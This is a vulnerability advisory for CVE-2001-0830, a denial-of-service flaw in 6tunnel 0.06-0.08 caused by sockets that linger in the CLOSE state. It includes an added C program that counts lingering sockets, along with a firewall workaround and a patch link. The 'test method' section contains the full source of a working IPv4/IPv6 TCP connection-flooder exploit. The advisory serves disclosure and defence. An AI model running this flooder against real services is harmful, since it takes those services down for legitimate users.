6Tunnel Connection Close State Denial of Service Vulnerability
Release date: 2001-10-23
Update date: 2001-10-26
Affected systems:
Wojtek Kaniewski 6tunnel 0.06
Wojtek Kaniewski 6tunnel 0.07
Wojtek Kaniewski 6tunnel 0.08
Unaffected systems:
Wojtek Kaniewski 6tunnel 0.09
Description:
BUGTRAQ ID: 3467
CVE(CAN) ID: CVE-2001-0830
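6Tunnel is a free, open-source software package that provides an IPv6 tunnel for
hosts that do not offer IPv6. A security issue has been found in the package that
may allow a remote attacker to make the service unavailable to legitimate users.
The cause is the way the package manages sockets. When a client disconnects from
the 6Tunnel server, the socket that client was using enters the "Close" state but
never times out, so once a large number of connection requests are sent to the
6Tunnel server, the service crashes.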
<*Source: awayzzz (awayzzz@digibel.org)
Link: http://archives.neohapsis.com/archives/bugtraq/2001-10/0200.html
*>
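Added example (not part of the original advisory and not 6tunnel code): a Linux check for the symptom described above, counting sockets on the tunnel's local port that sit in CLOSE or CLOSE_WAIT by parsing /proc/net/tcp and /proc/net/tcp6. The default port 667 is the test program's default; counting CLOSE_WAIT alongside the advisory's "Close" state is an assumption, and the sample table is constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* "st" column codes in /proc/net/tcp{,6} (Linux TCP states). */
#define ST_CLOSE      0x07
#define ST_CLOSE_WAIT 0x08

/* Constructed sample rows (columns after "st" trimmed); 0x029B = port 667. */
static const char SAMPLE[] =
"  sl  local_address rem_address   st\n"
"   0: 00000000:029B 00000000:0000 0A\n"
"   1: 0100007F:029B 0100007F:C350 08\n"
"   2: 0100007F:029B 0100007F:C351 07\n"
"   3: 00000000000000000000000001000000:029B 00000000000000000000000001000000:C352 08\n"
"   4: 0100007F:029B 0100007F:C353 01\n"
"   5: 0100007F:0016 0100007F:C354 08\n";

/* Count sockets on local `port` in CLOSE or CLOSE_WAIT; header and malformed rows are skipped. */
int count_lingering(const char *table, unsigned port)
{
    int n = 0;
    for (const char *p = table; p && *p; ) {
        unsigned lport, st;
        if (sscanf(p, " %*d: %*[0-9A-Fa-f]:%x %*[0-9A-Fa-f]:%*x %x",
                   &lport, &st) == 2 &&
            lport == port && (st == ST_CLOSE || st == ST_CLOSE_WAIT))
            n++;
        p = strchr(p, '\n');   /* advance to the next row */
        if (p) p++;
    }
    return n;
}

int main(int argc, char **argv)
{
    static char buf[1 << 20];   /* tables larger than this are truncated */
    const char *paths[] = { "/proc/net/tcp", "/proc/net/tcp6" };
    unsigned port = argc > 1 ? (unsigned)strtoul(argv[1], NULL, 10) : 667;
    int total = 0;
    for (int i = 0; i < 2; i++) {
        FILE *f = fopen(paths[i], "r");
        if (!f) continue;
        buf[fread(buf, 1, sizeof(buf) - 1, f)] = '\0';
        fclose(f);
        total += count_lingering(buf, port);
    }
    printf("port %u: %d socket(s) in CLOSE/CLOSE_WAIT\n", port, total);
    return 0;
}
```

A count that keeps growing on the tunnel port while few connections are established matches the socket build-up the description attributes to versions before 0.09.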
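Test method:
Warning
The following program (method) may be offensive in nature and is intended for security research and teaching only. Use at your own risk!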
/*
 * ipv4/ipv6 tcp connection flooder.
 * Originally used as a DoS for 6tunnel (versions < 0.08).
 * Version 0.08 is a broken version. Please update to 0.09.
 *
 * Description of options:
 * -6 : flood an ipv6 address.
 * port : tcp port to flood (default: 667)
 * delay: delay between connections (ms).
 * times: max number of connections (default: 2500).
 *
 * awayzzz <awayzzz@digibel.org>
 * You can even find me @IRCnet if you need.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define DEFP 667    // default port.
#define DEFT 2500   // default number of connections.
#define TIME 100000 // delay between connections.
                    // tune it for best performances!
#define HAVE_IPV6
#define VALID_PORT(i) (i<65535 && i > 0)

int main(int argc,char *argv[])
{
    int ret, fd, i, ip6 = 0;
    int times = DEFT, port = DEFP, delay = TIME;
    struct sockaddr_in sin;
#ifdef HAVE_IPV6
    struct sockaddr_in6 sin6;
#endif

    if( argc < 2 )
    {
        char *pname;
        if(!(pname = strrchr(argv[0],'/')))
            pname = argv[0];
        else
            pname++;
        printf("Usage: %s [-6] ip4/6 [port] [delay (ms)] [times]\n", pname);
        exit (0);
    }

    if(!strcmp(argv[1],"-6"))
    {
#ifdef HAVE_IPV6
        ip6 = 1;
#endif
        argv++;
        argc--;
    }

    if(argc > 2)
    {
        port = strtol(argv[2], NULL, 10);
        if(!VALID_PORT(port))
        {
            fprintf(stderr,"Invalid port number. Using default\n");
            port = DEFP;
        }
    }
    if(argc > 3)
        delay = strtol(argv[3], NULL, 10);
    if(argc > 4)
        times = strtol(argv[4], NULL, 10);

    printf("Started with %s flood to %s on %d for %d times!\n",
           (ip6 == 1) ? "ipv6" : "ipv4", argv[1], port, times);

    for (i = 0; i < times; i++)
    {
#ifdef HAVE_IPV6
        if(ip6)
        {
            fd = socket(AF_INET6, SOCK_STREAM, 0);
            memset(&sin6, 0, sizeof(sin6));
            sin6.sin6_family = AF_INET6;
            sin6.sin6_port = htons(port);
            inet_pton(AF_INET6,argv[1],sin6.sin6_addr.s6_addr);
        }
        else
        {
#endif /* HAVE_IPV6 */
            fd = socket(AF_INET, SOCK_STREAM, 0);
            memset(&sin, 0, sizeof(sin));
            sin.sin_family = AF_INET;
            sin.sin_addr.s_addr = inet_addr(argv[1]);
            sin.sin_port = htons(port);
#ifdef HAVE_IPV6
        }
        if(ip6)
            ret = connect(fd, (struct sockaddr *)&sin6, sizeof(sin6));
        else
#endif
            ret = connect(fd, (struct sockaddr *)&sin, sizeof(sin));
        if(ret < 0)
        {
            printf("connect %d failed.\n",i);
            perror("connect");
            break;
        }
        printf("Connection no. %d\n",i);
        close(fd);
        usleep(delay);
    }
}
/* :wq */
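Recommendations:
Temporary workaround:
If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measure to reduce the threat:
* Restrict connection requests from external users to this service port at your firewall.
Vendor patch:
6Tunnel 0.09 has fixed this issue.
Patch download address:
ftp://213.146.38.146/pub/wojtekka/6tunnel-0.09.tar.gz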